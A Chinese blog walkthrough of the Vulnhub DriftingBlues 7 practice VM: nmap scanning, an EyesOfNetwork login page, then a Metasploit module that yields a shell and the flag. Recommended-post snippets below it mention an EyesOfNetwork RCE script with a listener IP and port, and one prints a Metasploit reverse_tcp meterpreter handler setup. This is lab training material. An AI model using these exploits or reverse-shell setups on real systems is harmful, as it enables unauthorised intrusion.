Vulnhub:DRIFTINGBLUES: 7

原创 已于 2022-02-28 12:28:51 修改 · 3.2k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2022-02-28 12:22:45 首次发布
本文记录了一次在Vulnhub平台上进行的DRIFTINGBLUES 7靶机挑战。通过信息收集,发现靶机IP为192.168.2.90,并使用nmap进行端口扫描。在80端口上发现EyesOfNetwork登录平台,尝试目录扫描未果后,利用Metasploit找到相关漏洞进行攻击,成功获取权限,最终找到flag,完成挑战。整个过程展示了渗透测试的基本步骤和技术应用。

前言:

        在朋友的推荐下,空余时间中下载了vulnhub的随机靶机DRIFTINGBLUES:7,尝试实战

靶机在Vulnhub官网下载镜像,完成后可直接用VM打开虚拟机;努力成为专业白帽子!!!

信息收集:

        攻击机kali:192.168.2.87

        靶机ip:192.168.2.90

        打开靶机竟然直接看见了ip信息

IP:192.168.2.90

直接登入kali使用nmap端口扫描

nmap -sV 192.168.2.90

看见扫描的端口,一般情况下有80端口直接访问该端口

http://192.168.2.90

 获得一个Eyes Of Network登录平台,爆破对我来说一般是下下策;看到网址先进行目录扫描使用dirmap工具并没扫出什么有价值的东西,目录行不通

开始攻击:

        用msf搜索是否有被收录的相关漏洞

天助我也,竟然刚好有一个攻击模块;尝试攻击!

设置参数

 攻击成功并查看权限

最后一步查找flag!

结束!!

[Vulnhub靶机] DriftingBlues: 7
网安日记本的博客
02-16 1685
[Vulnhub靶机] DriftingBlues: 7靶机渗透思路及方法(个人分享)
vulnhubdriftingblues7_vh
鲨鱼辣椒的博客
06-09 745
目录 信息搜集 扫描网段 扫描IP地址 扫描网站目录 查看网站 发现漏洞 GETSHELL 总结 信息搜集 扫描网段 发现网站真实IP 扫描IP地址 发现开启的端口以及服务,以及中间件的一些版本信息(这可能会是我们后续渗透的突破点) 扫描网站目录 dirsearch -u https://192.168.179.137/ 虽然我并没有扫出什么有用的东西,但是这个扫的动作很重要,有时候就是一些不起眼的地方会给我们意想不到的惊喜(一定要注重细节,对于我们渗透.
Vulnhub靶机:driftingblues 7
qq_48904485的博客
01-19 514
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:driftingblues7(10.0.2.23)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/
vulnhub实战——DRIFTINGBLUES: 7
Ar_Gin Work
04-18 812
vulnhub实战——Driftingblues7 前言 无聊发现vulnhub上一个新靶机,下载来玩玩看,挺简单的。搜了搜没教程就写个教程给大家参考一下吧~ 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 可以直接用VM打开,ip会自动获取并显示出来(挺人性化的) 正文 通过nmap扫描靶机nmap -sV -O 192.168.171.134 发现有80端口,我们访问一下发现为一个登录页面,后台名称为EyesOfNetwork 再目录
VulnHubDRIFTINGBLUES: 7
weixin_42075643的博客
04-28 948
Vulnhub是一个很好的靶机平台,想看官网点这里。 今天学习DRIFTINGBLUES: 7,点击这里下载哦~ 推荐使用virtualBox,我这里是VMware,看自己条件使用 难度:简单 基础练习,大佬可以绕过 接下来导入虚拟机,这里选择NAT模式,成功后,如图: 这里使用kali作为攻击机,首先查看kali的ip: 使用nmap来探测靶机ip: nmap -sS 192.198.81.0/24 可以看到有80端口,先去浏览器找找线索: 是一个network登录界面,试试若口令,爆破啥的
Vulnhub靶机:driftingblues 9
qq_48904485的博客
01-20 962
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:driftingblues9(10.0.2.24)目标:获取靶机root权限和flag靶机下载地址:http://www.vulnhub.com/entry/driftingblues-9-final,695/
Vulnhub靶机:driftingblues 6
qq_48904485的博客
01-16 532
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:driftingblues6(10.0.2.22)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-6,672/
Vulnhub —— DriftingBlues系列
7ruth0hn的博客
11-27 913
文章目录写在前面思路DriftingBlues: 11.nmap扫描Tip:若靶机无法获取IP:2.漏洞探测与利用3.提权DriftingBlues: 2结语参考资料 写在前面 取证学习告一段落了,虽然个人赛失手了,但团体赛一等奖还是可以接受的。开始拖了很久的渗透学习 渗透工具: Nmap v7.91、gobuster、DIRB v2.22、crunch version 3.6、Hydra v9.1、pspy - version: v1.2.0 思路 DriftingBlues: 1 在官网下载ova文件
Vulnhub-DriftingBlues:7
从不专注的人的博客
06-08 256
Vulnhub-DriftingBlues:7 目录Vulnhub-DriftingBlues:7信息收集扫描目标网段查看端口及服务查看服务运行的版本访问网站提升权限运行脚本 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 信息收集 扫描目标网段 nmap -sP 172.16.58.0/24 查看端口及服务 nmap -p- 172.16.58.135 查看服务运行的版本 nmap -sV 172.16.58.135 访问
【靶场系列】driftingblues7
qq_41169485的博客
04-23 840
扫到一个.bash_history文件,下载查看,根据历史命令推测该目录下还存在一个eon文件。访问80端口,自动跳转到443端口,该cms是eyesofnetwork。根据查找到的EyesOfNetwork漏洞,选了一个可以rce的开始利用。使用john爆破zip密码,得到压缩包密码为killah。推测该账号密码是443端口的web页面登录密码,成功登录。搜索该cms的漏洞,可以看到该cms有很多漏洞。解码可知该文件是zip文件,因为有PK头。解码得到压缩包,但是需要密码才能打开。
靶机渗透练习07-driftingblues7
hirak0的博客
04-14 811
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-7,680/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. 一、搭建靶机环境
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-7
Aluxian_的博客
06-24 1566
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 下载好了把安装包解压 然后试用VMware即可。kali里使用发现主机 渗透机:kali IP :192.168.205.
Vulnhub-driftingblues:7
lionwerson的博客
01-03 601
nmap扫描端口: nmap.exe 192.168.0.11 -p- 开放的端口有很多,浏览器先打开80端口测试: 首先想到先测试一下用户名密码爆破,但是上网搜了一下,这个是一个网络监控框架,并且就有现成的Exploit可以使用,或者直接在msf中搜索就可以。 eyesofnetwork 5.1到5.3存在一个代码执行漏洞,而且可以直接获取root权限: #python3 eonrce.py ip:目标url -ip:监听的ip -port:监听的端口 python3 eonrce.py h
Vulnhub-DriftingBlues-7
weixin_50342860的博客
08-16 584
@TOC 简介 靶机下载:DriftingBlue-7 运行环境: 攻击机:kali 受害机:DriftingBlues-7 目标:夺到里面的flag 下载好靶机,直接打开(这里使用的是VM,模式选择NAT),如图 信息收集 扫描当前网段存活主机 查看端口及运行服务 查看服务版本 目录扫描 dirsearch 安装方法:点这里 扫描出来的目录没啥大发现 发现漏洞及利用漏洞 访问80端口会被跳转到如下页面 尝试了弱口令,暴力破解都没有猜解到密码,所以我们可以先去扫描一下它的目录结构。
VulnHubDriftingBlues: 7
Cobra的博客
04-06 3110
一、实验环境 攻击机(kali):192.168.189.148 靶机(ubuntu):192.168.189.156 靶场来自VulnHub 下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 二、信息收集 1、使用nmap扫描存活主机 nmap 192.168.189.0/24 2、发现存活主机 192.168.189.156,访问其80端口 3、暴力破解,SQL注入均无解,对其进行目录扫描后在json文件中.
vulnhub靶机 | DriftingBlues:7
在下小黄的博客
06-07 1264
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 未经允许,禁止转载 ,违者必究!!!! 本实验仅适用于学习和测试 ,严禁违法操作 ! ! ! 今天更新的是: vulnhub靶机 | DriftingBlues:7 靶机解题过程及思路 微信公众号回复:【靶机】,即可获取本文全部涉及到的工具。 创建时间:2021年6月7日 软件: MindMaster Pro、kali、DriftingBlues:7靶机 DriftingBlues:7靶机解题过程及思路前言:信息搜
vulnhub靶机 | DriftingBlues:7 write-up
xj28555的博客
05-04 8470
靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 题目的目标是要夺到里面的flag,搭建好环境如图。 首先用nmap扫描一下ip地址 nmap-sP192.168.110.1/24#扫描网段中存活主机 nmap-p-192.168.110.167 #在看看上面运行的服务 nmap-sV192.168.110.167#查看服务版本 上面运行的一些apache、...
【OSCP系列】OSCP靶机-driftingblues7_vh(原创)
Lusen的博客
07-20 1120
OSCP系列-driftingblues7_vh 靶场做题记录
DriftingBlues-7靶机进行渗透测试
zll___的博客
04-20 797
DriftingBlues-7靶机进行渗透测试
vulnhub靶机 driftingblues2
最新发布
01-04
### 关于VulnHub DriftingBlues2靶机详情 #### 靶机概述 DriftingBlues系列是VulnHub平台上提供给安全爱好者练习渗透测试技能的一组虚拟机镜像。这些靶机设计用于帮助用户提升其在网络攻防方面的能力,特别是针对Web应用的安全评估技巧。 对于特定的`DriftingBlues: 2`版本而言,此靶机旨在模拟真实世界中的信息系统环境,并设置了多个层次的任务来挑战玩家的技术水平[^4]。 #### 渗透测试流程 ##### 信息收集阶段 在这个过程中,首要任务是从外部视角了解目标系统的开放服务及其配置情况。通常采用的方法包括但不限于: - **主机发现**:通过网络扫描工具(如Nmap)识别活动主机并确定其IP地址范围。 - **端口和服务枚举**:进一步探测已知存活节点上的可用端口以及运行的服务类型和版本号。 由于`DriftingBlues: 2`的具体内部结构未完全公开,在实际操作前需自行探索更多细节以制定后续行动计划。 ##### 漏洞利用实践 一旦完成了初步的情报搜集工作,则可以根据所获数据选择合适的攻击向量实施入侵行为。例如,如果发现了某个存在已知漏洞的应用程序实例,则可考虑运用Metasploit Framework (MSF) 或其他自动化平台来进行针对性打击。 值得注意的是,在处理此类实验性质较强的项目时,建议遵循官方指南或社区分享的经验贴作为参考依据,以便更高效地完成整个过程[^5]。 ```bash # 使用Nmap进行基本的TCP SYN扫描 nmap -sS <target_ip> # 利用Metasploit加载exploit模块 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST <your_local_IP> run ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值